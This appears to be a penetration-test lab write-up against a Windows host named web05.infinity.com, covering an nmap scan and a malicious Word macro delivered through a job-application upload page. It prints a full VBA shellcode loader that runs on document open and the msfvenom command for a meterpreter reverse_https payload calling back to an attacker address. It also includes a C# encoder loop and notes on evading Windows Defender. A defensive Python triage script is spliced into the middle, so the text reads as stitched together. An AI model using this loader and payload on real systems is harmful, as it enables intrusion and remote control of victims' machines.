Command: nmap -A -Pn 192.168.243.121

Nmap initial output

Nmap scan report for 192.168.243.121
Host is up (0.21s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
**80/tcp   open  http          Microsoft IIS httpd 10.0**
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Job Application Upload Site
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc         Microsoft Windows RPC
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2022-07-09T13:38:14+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=web05.infinity.com
| Not valid before: 2022-06-19T00:57:09
|_Not valid after:  2022-12-19T00:57:09
| rdp-ntlm-info: 
|   Target_Name: INFINITY
|   NetBIOS_Domain_Name: INFINITY
|   NetBIOS_Computer_Name: WEB05
**|   DNS_Domain_Name: infinity.com
|   DNS_Computer_Name: web05.infinity.com
|   DNS_Tree_Name: infinity.com**
|   Product_Version: 10.0.17763
|_  System_Time: 2022-07-09T13:37:33+00:00
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP (85%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3
Aggressive OS guesses: Microsoft Windows XP SP3 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-07-09T13:37:39
|_  start_date: N/A

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   211.98 ms 192.168.49.1
2   212.07 ms 192.168.243.121

Port 80 is open, and the information returned on port 3389 shows that the host is named web05.infinity.com and belongs to the infinity.com domain.

Browsing to port 80:

[Screenshot: 01.png]

There is an upload point here. It tells us to upload a Word document, so the first thought is macro abuse.

Checking the dev machine shows that Word is 32-bit. Local test: the 32-bit PPID spoofing version combined with VBA Pears obfuscation (P208) gets past Windows Defender on the dev machine and returns a working reverse shell.

Uploading the tested Word document to .121 gives no callback; CLM (Constrained Language Mode) may be in place.

When configuring msf exploit/multi/handler, add set AutoRunScript "migrate -n explorer.exe" so that the shell obtained later is stable.

Here the Word macro uses the VBA runner, with the shellcode Caesar-encrypted.

Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr

Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr

Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr

Sub Rev()
    Dim buf As Variant
    Dim addr As LongPtr
    Dim counter As Long
    Dim data As Long
    Dim res As Long
    
    buf = Array(254, 234, 145, 2, 2, 2, 98, 51, 212, 102, 141, 84, 50, 139, 231, 141, 84, 14, 141, 84, 22, 51, 1, 141, 116, 42, 17, 185, 76, 40, 51, 194, 174, 62, 99, 126, 4, 46, 34, 195, 209, 15, 3, 201, 75, 119, 241, 84, 141, 84, _
18, 141, 68, 62, 3, 210, 89, 141, 66, 122, 135, 194, 118, 78, 3, 210, 82, 141, 90, 34, 3, 213, 141, 74, 26, 135, 203, 118, 62, 51, 1, 75, 141, 54, 141, 3, 216, 51, 194, 174, 195, 209, 15, 3, 201, 58, 226, 119, 246, 5, _
127, 250, 61, 127, 38, 119, 226, 90, 141, 90, 38, 3, 213, 104, 141, 14, 77, 141, 90, 30, 3, 213, 141, 6, 141, 3, 210, 139, 70, 38, 38, 93, 93, 99, 91, 92, 83, 1, 226, 90, 97, 92, 141, 20, 235, 130, 1, 1, 1, 95, _
106, 112, 103, 118, 2, 106, 121, 107, 112, 107, 86, 106, 78, 121, 40, 9, 1, 215, 51, 221, 85, 85, 85, 85, 85, 234, 134, 2, 2, 2, 79, 113, 124, 107, 110, 110, 99, 49, 55, 48, 50, 34, 42, 89, 107, 112, 102, 113, 121, 117, _
34, 80, 86, 34, 51, 50, 48, 50, 61, 34, 89, 107, 112, 56, 54, 61, 34, 122, 56, 54, 43, 34, 67, 114, 114, 110, 103, 89, 103, 100, 77, 107, 118, 49, 55, 53, 57, 48, 53, 56, 34, 42, 77, 74, 86, 79, 78, 46, 34, 110, _
107, 109, 103, 34, 73, 103, 101, 109, 113, 43, 34, 69, 106, 116, 113, 111, 103, 49, 59, 58, 48, 50, 48, 54, 57, 55, 58, 48, 58, 51, 34, 85, 99, 104, 99, 116, 107, 49, 55, 53, 57, 48, 53, 56, 34, 71, 102, 105, 49, 59, _
57, 48, 50, 48, 51, 50, 57, 52, 48, 56, 59, 2, 106, 60, 88, 123, 169, 1, 215, 85, 85, 108, 5, 85, 85, 106, 189, 3, 2, 2, 234, 67, 3, 2, 2, 49, 115, 105, 81, 115, 67, 101, 112, 73, 79, 121, 99, 47, 121, 57, _
97, 69, 53, 67, 106, 83, 115, 121, 78, 81, 113, 87, 54, 69, 73, 58, 114, 59, 97, 92, 87, 76, 113, 90, 107, 121, 116, 58, 79, 101, 122, 121, 80, 87, 71, 80, 88, 89, 102, 76, 91, 111, 86, 111, 109, 84, 120, 76, 123, 83, _
51, 71, 112, 107, 57, 80, 77, 55, 101, 82, 118, 82, 115, 79, 70, 51, 69, 81, 88, 55, 47, 54, 84, 78, 82, 99, 102, 115, 67, 102, 104, 75, 59, 91, 56, 53, 105, 112, 92, 85, 88, 84, 110, 110, 75, 121, 77, 82, 70, 114, _
72, 104, 90, 103, 108, 88, 80, 54, 109, 59, 50, 56, 84, 120, 83, 56, 53, 89, 121, 122, 116, 51, 83, 123, 88, 78, 103, 81, 78, 106, 73, 91, 124, 115, 80, 85, 70, 80, 79, 116, 81, 115, 50, 67, 90, 82, 102, 54, 78, 100, _
121, 117, 67, 71, 121, 102, 121, 74, 69, 124, 114, 76, 2, 82, 106, 89, 139, 161, 200, 1, 215, 139, 200, 85, 106, 2, 52, 234, 134, 85, 85, 85, 89, 85, 88, 106, 237, 87, 48, 61, 1, 215, 152, 108, 12, 97, 106, 130, 53, 2, _
2, 139, 226, 108, 6, 82, 108, 33, 88, 106, 119, 72, 160, 136, 1, 215, 85, 85, 85, 85, 88, 106, 47, 8, 26, 125, 1, 215, 135, 194, 119, 22, 106, 138, 21, 2, 2, 106, 70, 242, 55, 226, 1, 215, 81, 119, 207, 234, 77, 2, _
2, 2, 108, 66, 106, 2, 18, 2, 2, 106, 2, 2, 66, 2, 85, 106, 90, 166, 85, 231, 1, 215, 149, 85, 85, 139, 233, 89, 106, 2, 34, 2, 2, 85, 88, 106, 20, 152, 139, 228, 1, 215, 135, 194, 118, 209, 141, 9, 3, 197, _
135, 194, 119, 231, 90, 197, 97, 234, 109, 1, 1, 1, 51, 59, 52, 48, 51, 56, 58, 48, 54, 59, 48, 52, 54, 53, 2, 189, 242, 183, 164, 88, 108, 2, 85, 1, 215)
    **For i = 0 To UBound(buf)
    buf(i) = buf(i) - 2
    Next i**
    addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
    
    For counter = LBound(buf) To UBound(buf)
        data = buf(counter)
        res = RtlMoveMemory(addr + counter, data, 1)
    Next counter
    
    res = CreateThread(0, 0, addr, 0, 0, 0)
End Sub

Sub Document_Open()
    Rev
End Sub

Sub AutoOpen()
    Rev
End Sub

The part of the code above marked in bold (the loop that subtracts 2 from every byte) is the Caesar decryption.

The msfvenom command used to generate the windows/meterpreter/reverse_https shellcode is: msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.49.243 LPORT=443 -f csharp

Then feed the generated shellcode into the Caesar encryption program; note that the output must match VBA's Array() format:

using System.Text;

// 'encoded' is the byte[] produced by the Caesar shift; 'hex' collects the VBA text
var hex = new StringBuilder();
int counter = 0;
foreach (byte b in encoded)
{
    hex.AppendFormat("{0:D}, ", b);   // decimal values, comma separated, as VBA Array() expects
    counter++;
    if (counter % 50 == 0)
    {
        hex.AppendFormat("_{0}", Environment.NewLine);   // VBA line continuation every 50 values
    }
}
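From the defender's side, the macro above and the encoder output format it expects are easy to triage: a script can pull the Win32 Declare statements, rejoin the VBA `_` continuations, recover the shift constant from the decode loop and check whether the decoded bytes begin with the usual Metasploit x86 stager prologue (`fc e8`). The following analysis helper is an added example, not code from the write-up; the VBA fragment inside it is constructed and its byte values are made up.

```python
import re

# Constructed VBA fragment for the demo, not the macro from the write-up: the byte
# values are made up and only mimic its shape (decimal Array, "_" continuations, -2 shift).
SAMPLE_VBA = '''
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal a As LongPtr) As LongPtr
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal a As Long) As LongPtr
Sub Rev()
    buf = Array(254, 234, 2, 2, 2, 2, 1, 3, 5, 7, _
255, 0, 128)
    For i = 0 To UBound(buf)
    buf(i) = buf(i) - 2
    Next i
End Sub
'''

# Win32 APIs a benign document macro has no reason to declare.
SUSPICIOUS_APIS = {"VirtualAlloc", "CreateThread", "RtlMoveMemory", "WriteProcessMemory"}

def declared_apis(src):
    """Suspicious API names pulled from Declare statements."""
    names = re.findall(r"Declare\s+(?:PtrSafe\s+)?Function\s+(\w+)", src, re.I)
    return sorted(set(names) & SUSPICIOUS_APIS)

def extract_array(src):
    """Numeric literals of the first Array(...) call, after joining VBA '_' line continuations."""
    joined = re.sub(r"_[ \t]*\r?\n", "", src)
    m = re.search(r"Array\(([\d,\s]+)\)", joined)
    return [int(x) for x in m.group(1).split(",")] if m else []

def find_shift(src):
    """Constant to apply, recovered from a 'buf(i) = buf(i) - N' (or '+ N') decode loop."""
    m = re.search(r"(\w+)\((\w+)\)\s*=\s*\1\(\2\)\s*([+-])\s*(\d+)", src)
    if not m:
        return 0
    return -int(m.group(4)) if m.group(3) == "-" else int(m.group(4))

def decode(values, shift):
    """Undo the Caesar shift byte-wise, wrapping as the macro's Long-to-byte copy would."""
    return bytes((v + shift) & 0xFF for v in values)

def triage(src):
    """One-shot summary: declared APIs, shift, decoded length and the msfvenom prologue check."""
    shift = find_shift(src)
    data = decode(extract_array(src), shift)
    return {"apis": declared_apis(src), "shift": shift, "length": len(data),
            "msf_prologue": data[:2] == b"\xfc\xe8",  # cld; call: usual Metasploit x86 start
            "decoded_head": data[:4].hex()}
```

Run `triage()` over the macro source extracted from a suspect document (for example with olevba); the decoded bytes can then be handed to a disassembler or sandbox instead of being executed.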

One odd thing: on the dev machine the crafted macro was killed when run, yet after a successful upload through the upload point it did return a shell.

The returned shell:

[Screenshot: 03.png]

The host that connected back is 192.168.243.122, not 192.168.243.121, the one with port 80 open.